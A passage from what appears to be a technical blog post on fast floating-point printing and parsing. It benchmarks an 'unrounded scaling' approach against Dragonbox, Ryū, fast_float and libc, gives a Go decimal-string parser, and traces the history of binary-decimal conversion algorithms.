return the integer and exponent instead of formatting them.
Schubfach delayed the trimming of zeros until after formatting,
so I added a call to the <code>trimZeros</code> used by <code>Short</code>,
which is in turn similar to the one used in Dragonbox.
</div></div>
<div class=main-wide>
<style>
</style>
<table class=md id=_table5>
<tr class=th><th></th><th></th></tr>
<tr><td><a href="fpfmt/plot/fpfmt-apple-shortraw-scat-big.svg"><img name="fpfmt/plot/fpfmt-apple-shortraw-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-apple-shortraw-scat.png" srcset="fpfmt/plot/fpfmt-apple-shortraw-scat.png 1x, fpfmt/plot/fpfmt-apple-shortraw-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-shortraw-scat@2x.png 2x, fpfmt/plot/fpfmt-apple-shortraw-scat@3x.png 3x, fpfmt/plot/fpfmt-apple-shortraw-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-apple-shortraw-cdf-big.svg"><img name="fpfmt/plot/fpfmt-apple-shortraw-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-apple-shortraw-cdf.png" srcset="fpfmt/plot/fpfmt-apple-shortraw-cdf.png 1x, fpfmt/plot/fpfmt-apple-shortraw-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-shortraw-cdf@2x.png 2x, fpfmt/plot/fpfmt-apple-shortraw-cdf@3x.png 3x, fpfmt/plot/fpfmt-apple-shortraw-cdf@4x.png 4x"></a></td></tr>
<tr><td><a href="fpfmt/plot/fpfmt-ryzen-shortraw-scat-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-shortraw-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-ryzen-shortraw-scat.png" srcset="fpfmt/plot/fpfmt-ryzen-shortraw-scat.png 1x, fpfmt/plot/fpfmt-ryzen-shortraw-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-shortraw-scat@2x.png 2x, fpfmt/plot/fpfmt-ryzen-shortraw-scat@3x.png 3x, fpfmt/plot/fpfmt-ryzen-shortraw-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-ryzen-shortraw-cdf-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-shortraw-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-ryzen-shortraw-cdf.png" srcset="fpfmt/plot/fpfmt-ryzen-shortraw-cdf.png 1x, fpfmt/plot/fpfmt-ryzen-shortraw-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-shortraw-cdf@2x.png 2x, fpfmt/plot/fpfmt-ryzen-shortraw-cdf@3x.png 3x, fpfmt/plot/fpfmt-ryzen-shortraw-cdf@4x.png 4x"></a></td></tr>
</table>
</div>
<div class=main><div class=article>
<p>
The difference between these plots and the previous ones shows that
most of Dragonbox’s apparent speed before was in its digit formatter,
not in the actual binary-to-decimal conversion.
<a href="https://github.com/jk-jeon/dragonbox/blob/e4a85ebee62750382bc7d1eef4bb72f9696d073f/source/dragonbox_to_chars.cpp">That converter</a> effectively has
a different straight-line code path for each number length.
It’s not surprising that it’s faster,
but it’s more code than I’m willing to stomach myself.
<p>
The scatterplots show that the Ryū code’s special case for integer inputs
helps for a few inputs (at the bottom of the plot) but runs slower than
the general case for more inputs (at the top of the plot).
On the other hand, the vertical lines of blue points near <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>500</mn></msup></mrow></math>
and <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>700</mn></msup></mrow></math> are likely not algorithmic,
nor is the vertical line of black points near <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>100</mn></msup></mrow></math>.
Both appear to be some kind of bad Apple M4 interaction when accessing a
specific table entry.
The specific inputs are executed in random order,
so a clustering like this is not transient interference such as
a single overloaded moment on the machine.
For a given built executable, the slow inputs are consistent;
as the code and data sections move around when the program
is changed, the slow inputs move too.
There is also a general phenomenon that if you sample 10,000
points, some of them will run slower than others due to
random hardware interactions.
All this is to say that the tails of the CDFs
for these very quick operations are not entirely trustworthy.
<p>
On a more reliable note,
the CDFs show that Dragonbox has a fast path that is taken about 60% of the time
and runs faster than unrounded scaling,
but the cost of that check is to make the remaining 40% slower
than unrounded scaling.
On average, they are about the same,
but unrounded scaling is more consistent and less code.
<p>
Overall, unrounded scaling runs faster than or at the same speed as
the others,
especially when focusing on the core conversion.
When formatting text, Dragonbox runs faster, but only because
of its digit formatting code, not the code we are focusing on
in this post.
<a class=anchor href="#parsing_text"><h3 id="parsing_text">Parsing Text</h3></a>
<p>
Like for printing, to compare against other parsing implementations
we need code to handle text, not just the integers passed to <code>Parse</code>.
Here is the parser I used.
It could be improved to handle arbitrary numbers of leading and trailing zeros,
negative numbers, and special values like zero, infinity and NaN,
but it is close enough for our purposes.
It is essentially a direct translation of the regular expression
<code>[0-9]*(\.[0-9]*)?([Ee][+-]?[0-9]*)?</code>,
with checks on the digit counts.
<div class=showcode><pre><span class=showcode-comment>// ParseText parses a decimal string s</span>
<span class=showcode-comment>// and returns the nearest floating point value.</span>
<span class=showcode-comment>// It returns 0, false if the input s is malformed.</span>
func ParseText(s []byte) (f float64, ok bool) {
	isDigit := func(c byte) bool { return c-'0' <= 9 }
	<span class=showcode-comment>// Read digits.</span>
	const maxDigits = 19
	d := uint64(0) <span class=showcode-comment>// decimal value of digits</span>
	frac := 0 <span class=showcode-comment>// count of digits after decimal point</span>
	i := 0
	for ; i < len(s) && isDigit(s[i]); i++ {
		d = d*10 + uint64(s[i]) - '0'
	}
	if i > maxDigits {
		return <span class=showcode-comment>// too many digits</span>
	}
	if i < len(s) && s[i] == '.' {
		i++
		for ; i < len(s) && isDigit(s[i]); i++ {
			d = d*10 + uint64(s[i]) - '0'
			frac++
		}
		if i == 1 || i > maxDigits+1 {
			return <span class=showcode-comment>// no digits or too many digits</span>
		}
	}
	if i == 0 {
		return <span class=showcode-comment>// no digits</span>
	}
	<span class=showcode-comment>// Read exponent.</span>
	p := 0
	if i < len(s) && (s[i] == 'e' || s[i] == 'E') {
		i++
		sign := +1
		if i < len(s) {
			if s[i] == '-' {
				sign = -1
				i++
			} else if s[i] == '+' {
				i++
			}
		}
		if i >= len(s) || len(s)-i > 3 {
			return <span class=showcode-comment>// missing or too large exponent</span>
		}
		for ; i < len(s) && isDigit(s[i]); i++ {
			p = p*10 + int(s[i]) - '0'
		}
		p *= sign
	}
	if i != len(s) {
		return <span class=showcode-comment>// junk on end</span>
	}
	return Parse(d, p-frac), true
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L140-L195">fpfmt/fpfmt.go:140,195</a></div><div class=showcode-end></div>
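<p>
As a quick sanity check of the parser, here is a small example-style test,
a sketch of my own that assumes <code>ParseText</code> and <code>Parse</code> live
in an <code>fpfmt</code> package as above:
<div class=showcode><pre>package fpfmt

import "fmt"

<span class=showcode-comment>// ExampleParseText runs the text parser on a few sample inputs.</span>
func ExampleParseText() {
	for _, s := range []string{"123.456", "1e-3", "9.75e+2", ".5", "12x"} {
		f, ok := ParseText([]byte(s))
		fmt.Printf("%q => f=%v ok=%v\n", s, f, ok)
	}
	<span class=showcode-comment>// Output:</span>
	<span class=showcode-comment>// "123.456" => f=123.456 ok=true</span>
	<span class=showcode-comment>// "1e-3" => f=0.001 ok=true</span>
	<span class=showcode-comment>// "9.75e+2" => f=975 ok=true</span>
	<span class=showcode-comment>// ".5" => f=0.5 ok=true</span>
	<span class=showcode-comment>// "12x" => f=0 ok=false</span>
}</pre></div><div class=showcode-end></div>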
<a class=anchor href="#parsing_performance"><h3 id="parsing_performance">Parsing Performance</h3></a>
<p>
Now we can compare <code>Parse</code> to other implementations.
I generated 10,000 random inputs,
each of which was a random 19-digit sequence
with a decimal point after the first digit,
along with a random decimal exponent in the range [-300, 300].
(The full float64 decimal exponent range is [-308, 308],
but narrowing it avoids generating numbers
that underflow to 0 or overflow to infinity.)
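<p>
For concreteness, here is a sketch in Go of how such an input can be generated.
It is illustrative only, not necessarily the exact benchmark harness;
in particular, the nonzero leading digit is an arbitrary choice.
<div class=showcode><pre>package main

import (
	"fmt"
	"math/rand"
)

<span class=showcode-comment>// genInput returns one random parsing input: a 19-digit sequence with a</span>
<span class=showcode-comment>// decimal point after the first digit and a decimal exponent chosen</span>
<span class=showcode-comment>// uniformly from [-300, 300].</span>
func genInput(r *rand.Rand) string {
	digits := make([]byte, 19)
	digits[0] = '1' + byte(r.Intn(9))
	for i := 1; i < len(digits); i++ {
		digits[i] = '0' + byte(r.Intn(10))
	}
	exp := r.Intn(601) - 300
	return fmt.Sprintf("%c.%se%d", digits[0], digits[1:], exp)
}

func main() {
	r := rand.New(rand.NewSource(1))
	for i := 0; i < 3; i++ {
		fmt.Println(genInput(r))
	}
}</pre></div><div class=showcode-end></div>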
<p>
The implementations are:
<ul>
<li>
<b>abseil</b>: The <a href="https://github.com/abseil/abseil-cpp">Abseil library</a>, using <code>absl::from_chars</code> as of November 2025 (commit 48bf10f142). <a href="https://github.com/abseil/abseil-cpp/blob/20250814.1/absl/strings/charconv.cc">It uses</a> the Eisel-Lemire algorithm [<a class=footref id='fnref-22-2' href='#fn-22'>22</a>].
<li>
<b>libc</b>: The C library’s <code>strtod</code>. <a href="https://github.com/bminor/glibc/blob/glibc-2.39/stdlib/strtod_l.c">Linux glibc uses</a> a bignum-based algorithm,
while <a href="https://github.com/apple-oss-distributions/Libc/blob/Libc-1725.40.4/stdlib/strtofp.c">macOS 26 libc uses</a> the Eisel-Lemire algorithm.
<li>
<b>dblconv</b>: The <a href="https://github.com/google/double-conversion">double-conversion library</a>’s <code>StringToDouble</code> function. It uses Clinger’s algorithm [<a class=footref id='fnref-6' href='#fn-6'>6</a>] with simulated floating-point
using 64-bit mantissas.
<li>
<b>dmg1997</b>: Gay’s <code>strtod</code> from the 1997 version of <code>dtoa.c</code>.
It uses Clinger’s algorithm with hardware floating-point (float64s).
<li>
<b>dmg2017</b>: Gay’s <code>strtod</code> from the 2017 version of <code>dtoa.c</code>.
It uses Clinger’s algorithm with simulated floating-point using 96-bit mantissas.
<li>
<b>fast_float</b>: Lemire’s <a href="https://github.com/fastfloat/fast_float">fast_float library</a>, using the <code>fast_float::from_chars</code> function. Unsurprisingly, it uses the Eisel-Lemire algorithm.
<li>
<b>uscale</b>: The unrounded scaling approach, using the Go code for <code>Parse</code> and <code>Unfmt</code> in this post.
<li>
<b>uscalec</b>: A C translation of the Go code in this post.</ul>
</div></div>
<div class=main-wide>
<style>
</style>
<table class=md id=_table6>
<tr class=th><th></th><th></th></tr>
<tr><td><a href="fpfmt/plot/fpfmt-apple-parse-scat-big.svg"><img name="fpfmt/plot/fpfmt-apple-parse-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-apple-parse-scat.png" srcset="fpfmt/plot/fpfmt-apple-parse-scat.png 1x, fpfmt/plot/fpfmt-apple-parse-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-parse-scat@2x.png 2x, fpfmt/plot/fpfmt-apple-parse-scat@3x.png 3x, fpfmt/plot/fpfmt-apple-parse-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-apple-parse-cdf-big.svg"><img name="fpfmt/plot/fpfmt-apple-parse-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-apple-parse-cdf.png" srcset="fpfmt/plot/fpfmt-apple-parse-cdf.png 1x, fpfmt/plot/fpfmt-apple-parse-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-parse-cdf@2x.png 2x, fpfmt/plot/fpfmt-apple-parse-cdf@3x.png 3x, fpfmt/plot/fpfmt-apple-parse-cdf@4x.png 4x"></a></td></tr>
<tr><td><a href="fpfmt/plot/fpfmt-ryzen-parse-scat-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-parse-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-ryzen-parse-scat.png" srcset="fpfmt/plot/fpfmt-ryzen-parse-scat.png 1x, fpfmt/plot/fpfmt-ryzen-parse-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-parse-scat@2x.png 2x, fpfmt/plot/fpfmt-ryzen-parse-scat@3x.png 3x, fpfmt/plot/fpfmt-ryzen-parse-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-ryzen-parse-cdf-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-parse-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-ryzen-parse-cdf.png" srcset="fpfmt/plot/fpfmt-ryzen-parse-cdf.png 1x, fpfmt/plot/fpfmt-ryzen-parse-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-parse-cdf@2x.png 2x, fpfmt/plot/fpfmt-ryzen-parse-cdf@3x.png 3x, fpfmt/plot/fpfmt-ryzen-parse-cdf@4x.png 4x"></a></td></tr>
</table>
</div>
<div class=main><div class=article>
<p>
The surprise here is the macOS libc, which is competitive with unrounded scaling and fast_float.
It turns out that macOS 26 shipped a new strtod based on the Eisel-Lemire algorithm.
<p>
Once again, to isolate the actual conversion from the text processing,
I also benchmarked <code>Parse</code> and equivalent code from fast_float.
</div></div>
<div class=main-wide>
<style>
</style>
<table class=md id=_table7>
<tr class=th><th></th><th></th></tr>
<tr><td><a href="fpfmt/plot/fpfmt-apple-parseraw-scat-big.svg"><img name="fpfmt/plot/fpfmt-apple-parseraw-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-apple-parseraw-scat.png" srcset="fpfmt/plot/fpfmt-apple-parseraw-scat.png 1x, fpfmt/plot/fpfmt-apple-parseraw-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-parseraw-scat@2x.png 2x, fpfmt/plot/fpfmt-apple-parseraw-scat@3x.png 3x, fpfmt/plot/fpfmt-apple-parseraw-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-apple-parseraw-cdf-big.svg"><img name="fpfmt/plot/fpfmt-apple-parseraw-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-apple-parseraw-cdf.png" srcset="fpfmt/plot/fpfmt-apple-parseraw-cdf.png 1x, fpfmt/plot/fpfmt-apple-parseraw-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-parseraw-cdf@2x.png 2x, fpfmt/plot/fpfmt-apple-parseraw-cdf@3x.png 3x, fpfmt/plot/fpfmt-apple-parseraw-cdf@4x.png 4x"></a></td></tr>
<tr><td><a href="fpfmt/plot/fpfmt-ryzen-parseraw-scat-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-parseraw-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-ryzen-parseraw-scat.png" srcset="fpfmt/plot/fpfmt-ryzen-parseraw-scat.png 1x, fpfmt/plot/fpfmt-ryzen-parseraw-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-parseraw-scat@2x.png 2x, fpfmt/plot/fpfmt-ryzen-parseraw-scat@3x.png 3x, fpfmt/plot/fpfmt-ryzen-parseraw-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-ryzen-parseraw-cdf-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-parseraw-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-ryzen-parseraw-cdf.png" srcset="fpfmt/plot/fpfmt-ryzen-parseraw-cdf.png 1x, fpfmt/plot/fpfmt-ryzen-parseraw-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-parseraw-cdf@2x.png 2x, fpfmt/plot/fpfmt-ryzen-parseraw-cdf@3x.png 3x, fpfmt/plot/fpfmt-ryzen-parseraw-cdf@4x.png 4x"></a></td></tr>
</table>
</div>
<div class=main><div class=article>
<p>
I don’t understand the notch in the Go uscale on macOS,
nor do I understand why the C uscale is faster than fast_float on macOS
but only about the same speed on Linux.
Since each conversion takes only a few nanoseconds,
the answer may be subtle microarchitectural effects
that I’m not particularly skilled at chasing down.
<p>
Overall,
unrounded scaling is faster than—or in one case tied with—the other known
algorithms for converting floating-point numbers
to and from decimal representations.
<a class=anchor href="#related"><h2 id="related">Related Work</h2></a>
<blockquote>
<p>
The story is told of G. H. Hardy (and of other people) that during a lecture
he said “It is obvious. . . <i>Is</i> it obvious?” left the room, and returned fifteen minutes
later, saying “Yes, it’s obvious.”
I was present once when Rogosinski asked Hardy whether the story were true.
Hardy would admit only that he might have said “It’s obvious. . . <i>Is</i> it obvious?” (brief pause)
“Yes, it’s obvious.” <br>
— Ralph P. Boas, Jr., <i>Lion Hunting and Other Mathematical Pursuits</i></blockquote><blockquote>
<p>
If I have seen further, it is by standing on the shoulders of giants. <br>
— Isaac Newton</blockquote><blockquote>
<p>
So I picked up my staff <br>
And I followed the trail <br>
Of his smoke to the mouth of the cave <br>
And I bid him come out <br>
Yea, forsooth, I did shout <br>
“Ye fool dragon, be gone! Or behave!” <br>
— Marsha Norman, <i>The Secret Garden</i> (musical)</blockquote>
<p>
People have been studying the problem of floating-point printing
and parsing since the late 1940s.
The solutions in this post, based on a fast, accurate unrounded scaling primitive,
may seem obvious in retrospect,
but they were certainly not obvious to me when I started down this trail.
Nor were they obvious to the many people
who studied this problem before, or we’d already be using these faster, simpler algorithms!
As is often the case in computer science,
the algorithms in this post
connect individual ideas that have been known for decades.
This section traces the history of the relevant ideas.
<p>
The companion post “<a href="fp-proof">Fast Unrounded Scaling: Proof by Ivy</a>” has
its own <a href="fp-proof#related">related work section</a>
that covers the history of proofs that a table of
128-bit powers of ten is sufficient for accurate results.
<a class=anchor href="#related.fixed"><h3 id="related.fixed">Fixed-Point Printing</h3></a>
<p>
The earliest binary/decimal conversions in the literature are probably
the ones in Goldstine and von Neumann’s 1947
<i>Planning and Coding Problems for an Electronic Computing Instrument</i> [<a class=footref id='fnref-13' href='#fn-13'>13</a>].
They converted one digit at a time by repeated multiplication by 10
and modulo by 1,
as did many conversions that followed.
<p>
The alternative to repeated multiplication by 10
is multiplication by a single larger power of 10,
as we did in this post.
Many early systems did that as well.
In a 1966 article in <i>CACM</i>, Mancino [<a class=footref id='fnref-24' href='#fn-24'>24</a>]
summarized the state of the art:
“Decimal-to-binary and binary-to-decimal
floating-point conversion is often performed by using a table of the powers
<math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>i</mi></msup></mrow></math> (<math><mi>i</mi></math> a positive integer) for converting from base 10 to base
2, and by using a table of the coefficients of a polynomial
approximation of <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>x</mi></msup></mrow></math> <math><mrow><mo stretchy=false>(</mo><mn>0</mn><mo>≤</mo><mi>x</mi><mo><</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></math> for converting from base
2 to base 10.”
Mancino’s article then showed that the powers-of-10 table could be
used for binary-to-decimal as well
and also discussed reducing its size.
<p>
During the development of IEEE 754 floating-point, Coonen published
an implementation guide [<a class=footref id='fnref-7' href='#fn-7'>7</a>] that defined
conversions in both directions using powers of 10 constructed on demand.
The powers <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> for <math><mrow><mn>1</mn><mo>≤</mo><mi>p</mi><mo>≤</mo><mn>27</mn></mrow></math> can be computed exactly,
and then Coonen suggested storing a table containing
<math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mn>54</mn></msup></mrow></math>, <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mn>108</mn></msup></mrow></math>, and <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mn>216</mn></msup></mrow></math>,
so that any power up to <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mn>308</mn></msup></mrow></math> can be
constructed using at most three multiplications
involving at most two inexact values.
Coonen computed an approximate <math><mi>p</mi></math> using a different
approximation to <math><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub></mrow></math>;
if it was off by one, he repeated the process with <math><mi>p</mi></math>
incremented or decremented by 1.
The result was not exact but was provably within a very small
error margin, which became IEEE754’s required
conversion accuracy.
Coonen’s thesis [<a class=footref id='fnref-9' href='#fn-9'>9</a>] improved on that error margin
by changing the table to contain the exceptionally accurate powers
<math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mn>55</mn></msup></mrow></math>, <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mn>108</mn></msup></mrow></math>, and <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mn>206</mn></msup></mrow></math>,
improved the log approximation,
and discussed how to use the floating-point hardware’s
rounding modes and inexact flag to reduce the error further.
In some ways, unrounded scaling is similar to
the hardware Coonen shows in this diagram from Chapter 2:
<p>
<img name="fpfmt-coonen1" class="center pad" width=396 height=252 src="fpfmt-coonen1.png" srcset="fpfmt-coonen1.png 1x, fpfmt-coonen1@1.5x.png 1.5x, fpfmt-coonen1@2x.png 2x">
<p>
The main differences are that unrounded scaling uses enough precision
to avoid any error at all,
that some of the chopped bits are discarded entirely
rather than feeding into the inexact flag (the sticky bit),
and that all the details have to be implemented in software
instead of relying on floating-point hardware.
In an appendix to his thesis, Coonen also defined
bignum-based exact conversion routines
written in Pascal.
(It would be interesting to translate them to C and
add them to the benchmarks above!)
<p>
1990 was the <i>annus mirabilis</i> of floating-point formatting.
In April, Slishman [<a class=footref id='fnref-29' href='#fn-29'>29</a>] published table-based algorithms
for printing and parsing at fixed precision.
The algorithms computed 16 additional bits of precision,
falling back to a bignum-based implementation only
when those 16 bits were all 1’s.
This is analogous to unrounded scaling’s check
for whether the middle bits are all 0’s
and appears to be the earliest analysis of the effect
of error carries on the eventual result.
(Slishman used a table of powers rounded down,
while unrounded scaling uses a table of powers rounded up,
so the overflow conditions are inverted.)
<p>
In June at the ACM PLDI conference, Steele and White published
“How to Print Floating-Point Numbers Accurately” [<a class=footref id='fnref-30-2' href='#fn-30'>30</a>]
(and Clinger also published “How to Read Floating Point Numbers Accurately” [<a class=footref id='fnref-6-2' href='#fn-6'>6</a>], discussed later).
Although the paper is mainly cited for shortest-width formatting,
Steele and White do discuss fixed-width formatting briefly.
Their algorithms use repeated multiplication by 10
instead of a table.
<p>
In November, Gay [<a class=footref id='fnref-11-2' href='#fn-11'>11</a>] published important optimizations for
both printing and parsing
but left the basic algorithms unmodified.
Gay also published a portable, freely redistributable C implementation.
As noted earlier, that implementation is probably one of the
most widely copied software libraries ever.
<p>
In a 2004 retrospective [<a class=footref id='fnref-31' href='#fn-31'>31</a>], Steele and White explained:<blockquote>
<p>
During the 1980s, White investigated the question of whether one
could use limited-precision arithmetic after all rather than bignums.
He had earlier proved by exhaustive testing that just 7 extra bits suffice for correctly printing 36-bit PDP-10 floating-point numbers, if
powers of ten used for prescaling are precomputed using bignums
and rounded just once. But can one derive, without exhaustive testing, the necessary amount of extra precision solely as a function of
the precision and exponent range of a floating-point format? This
problem is still open, and appears to be very hard.</blockquote>
<p>
In 1991, Paxson [<a class=footref id='fnref-28' href='#fn-28'>28</a>] identified the necessary algorithms
to answer that question,
but he put them to use only for deriving difficult test cases,
not for identifying the precision needed to avoid bignums entirely.
My <a href="fp-proof">proof post</a> covers that in detail.
<p>
It appears that the first table-based exact conversions without bignums
were developed by Kenton Hanson at Apple,
who documented them on his personal web site in 1997 [<a class=footref id='fnref-15' href='#fn-15'>15</a>]
after retiring. He summarized:<blockquote>
<p>
Once this worst case is determined we have shown how we can
guarantee correct conversions using arithmetic that is slightly
more than double the precision of the target destinations.</blockquote>
<p>
Like Slishman’s work at IBM, Hanson’s work unfortunately went mostly
unnoticed by the broader research community.
<p>
In 2018, Adams [<a class=footref id='fnref-2-3' href='#fn-2'>2</a>] published Ryū, an algorithm for
shortest-width formatting that used 128-bit tables.
After reading that paper
(discussed more in the next section),
Remy Oudompheng
<a href="https://go.dev/change/0184b445c04a0f30e34ce624298547f12630f3aa">rewrote Go’s fixed-width printer</a>
to adopt a table-based single-multiplication strategy.
He originally described it as “a simplified version of [Ryū]
for printing floating-point numbers with a fixed number of decimal
digits,”
but he told me recently
that he meant only that the code made use of the Ryū paper’s observation
that 128-bit precision is generally sufficient for correct conversion.
Because the Ryū paper did not address fixed-width printing
nor prove the correctness of the conversions in that context,
Oudompheng devised a new <a href="https://github.com/remyoudompheng/fptest">computational proof</a> based on
<a href="https://en.wikipedia.org/wiki/Stern%E2%80%93Brocot_tree">Stern-Brocot tree traversal</a>.
Oudompheng’s printer
uses Ryū’s fairly complex rounding implementation
and expensive exactness computation based on a
<a href="https://go.googlesource.com/go/+/refs/tags/go1.25.0/src/strconv/ftoaryu.go#546">“divide by five” loop</a>.
I wrote Go’s original floating-point printing routines in 2008
but had not kept up with recent advances.
In 2025, I happened to read Oudompheng’s printer
and realized that the calculation could be significantly simplified
using standard IEEE754 hardware implementation techniques,
including keeping a sticky bit during scaling.
That was the first step down the path to
the general approach of unrounded scaling.
<p>
I am not sure where IEEE754’s sticky bit originated.
The earliest use of it I have found is in Palmer’s 1977 paper
introducing Intel’s standard floating-point [<a class=footref id='fnref-27' href='#fn-27'>27</a>],
but I don’t know whether the sticky bit was new in that hardware design.
<p>
The unrounded scaling approach to fixed-width printing
can be viewed as the same table-based approach
described by Mancino [<a class=footref id='fnref-24-2' href='#fn-24'>24</a>] and Coonen [<a class=footref id='fnref-7-2' href='#fn-7'>7</a>],
but using 128-bit precision
to produce exact results,
as first noted by Hanson [<a class=footref id='fnref-15-2' href='#fn-15'>15</a>]
and then by Hack [<a class=footref id='fnref-14' href='#fn-14'>14</a>] and Adams [<a class=footref id='fnref-2-4' href='#fn-2'>2</a>].
<a class=anchor href="#related.short"><h3 id="related.short">Shortest Printing</h3></a>
<p>
Shortest-width printing has a related but distinct history.
The idea may have begun with Taranto’s 1959 <i>CACM</i> article [<a class=footref id='fnref-33' href='#fn-33'>33</a>],
which considered the problem of converting a fixed-point decimal fraction
into a fixed-point binary fraction of the shortest length to reach a given fixed decimal precision.
From that paper, Knuth derived the problem of converting between any two bases
with shortest output for a fixed precision, publishing it in 1969
as exercise 4.4–3 in the first edition of
<i>The Art of Computer Programming, Volume 2: Seminumerical Algorithms</i> [<a class=footref id='fnref-18' href='#fn-18'>18</a>].
Knuth included his own solution with a reference to Taranto.
Knuth’s exercise was not quite the <a href="#short">Shortest-Width Printing</a>
problem considered above: first, the exercise is about fixed-point fractions,
so it avoids the complexity of skewed footprints;
and second, the exercise gave no requirement to round correctly,
and the solution did not.
<p>
Steele and White adapted Knuth’s exercise and solution as the basis
for floating-point printing routines in the mid-to-late 1970s.
At the time, they shared a draft paper with Knuth, but the final paper
was not published until PLDI 1990 [<a class=footref id='fnref-30-3' href='#fn-30'>30</a>].
Their fixed-point printing algorithm (FP)³ is Knuth’s solution to exercise 4.4–3,
but updated to round correctly.
In the second edition of <i>Seminumerical Algorithms</i> [<a class=footref id='fnref-19' href='#fn-19'>19</a>],
Knuth changed the exercise to specify rounding,
made Steele and White’s one-line change to the solution,
and cited their unpublished draft.
In the third edition in 1997 [<a class=footref id='fnref-20' href='#fn-20'>20</a>], Knuth was able to cite the published paper.
In my post “<a href="fp-knuth">Pulling a New Proof from Knuth’s Fixed-Point Printer</a>”,
the section titled “<a href="fp-knuth#textbook">A Textbook Solution</a>”
examines Taranto’s, Knuth’s, and Steele and White’s fixed-point algorithms in detail.
<p>
Steele and White’s 1990 paper kicked off a flurry of activity focused mainly
on shortest-width printing.
Their converters were named Dragon2 and Dragon4 (Dragon1 is never described,
and they say they omitted Dragon3 for space),
which set a dragon-themed naming pattern continued by
the ever-more complex printing algorithms that followed.
Gay [<a class=footref id='fnref-11-3' href='#fn-11'>11</a>] and Burger and Dybvig [<a class=footref id='fnref-5' href='#fn-5'>5</a>] found important optimizations
for special cases but left
the core algorithms the same.
In their 2004 retrospective [<a class=footref id='fnref-31-2' href='#fn-31'>31</a>], Steele and White described those
as the only successor papers of note,
but that soon changed.
<p>
Loitsch [<a class=footref id='fnref-23-3' href='#fn-23'>23</a>] introduced the Grisu2 and Grisu3 algorithms at PLDI 2010.
Both use a “do-it-yourself floating-point” or “diy-fp” representation
limited to 64-bit mantissas
to calculate the minimum and maximum decimals
for a given floating point input,
like in our <a href="#short">shortest-width algorithm</a>.
64 bits is not enough to convert exactly,
so Grisu2 rounds the minimum and maximum inward
conservatively.
As a result, it always finds an accurate answer
but may not find the shortest one.
Grisu3 repeats that computation rounding outward.
If its answer also lies within the conservative Grisu2 bounds,
that answer must be shortest.
Otherwise, a fallback algorithm must be used instead.
Grisu3 avoids the fallback
about 99.5% of the time for random inputs.
Due to the importance of formatting speed in
JavaScript and especially JSON,
web browsers and programming languages quickly adopted Grisu3.
<p>
Andrysco, Jhala, and Lerner introduced the Errol algorithms at POPL 2016 [<a class=footref id='fnref-4-2' href='#fn-4'>4</a>].
They extended Loitsch’s approach by replacing
the diy-fps with 106-bit double-double arithmetic [<a class=footref id='fnref-10' href='#fn-10'>10</a>] [<a class=footref id='fnref-18-2' href='#fn-18'>18</a>],
which empirically handles 99.9999999% of all inputs.
They claimed to show empirically that “further precision is useless”
and, by careful refinement and analysis,
identified that their final version Errol3 failed
for only 45 float64 inputs (!),
which they handled with a special lookup table.
I am not sure what went wrong in their analysis
that kept them from finding that 128-bit precision would have
been completely exact.
<p>
Picking up a different thread,
Abbott <i>et al.</i> [<a class=footref id='fnref-1' href='#fn-1'>1</a>]
published a report in 1999 about IBM’s addition of
IEEE754 floating-point to System/390 and repeated
a description of Slishman’s algorithms [<a class=footref id='fnref-29-2' href='#fn-29'>29</a>].
After reader feedback, Hack [<a class=footref id='fnref-14-2' href='#fn-14'>14</a>] analyzed
the error behavior and in 2004 published the
first proof that 128-bit precision was sufficient
for parsing.
Nadezhin [<a class=footref id='fnref-26' href='#fn-26'>26</a>] adapted the proof to printing
